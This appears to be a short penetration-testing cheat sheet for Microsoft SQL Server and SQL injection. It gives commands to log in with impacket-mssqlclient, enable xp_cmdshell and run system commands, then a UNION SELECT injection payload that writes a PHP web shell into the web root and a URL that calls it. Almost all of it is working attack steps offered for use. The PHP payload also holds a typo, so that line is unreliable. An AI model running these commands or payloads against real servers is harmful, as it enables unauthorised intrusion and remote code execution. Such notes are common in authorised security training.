MSSQL
impacket-mssqlclient
impacket-mssql user:pass@ipaddr -windows-auth
EXECUTE sp_configure 'show advance options', 1;
## need to make the change permanent
RECONFIGURE;
## enable xp_cmdshell
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
## to run commands, use
EXECUTE xp_cmdshell 'whoami';
## to write files on the web server (start with one NULL, then increase the count until it matches the column count)
' UNION SELECT "<?php system($_GET['cmd']};?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
## If this creates the file, navigate to the path and add the cmd parameter
<ip>/tmp/webshell.php?cmd=whoami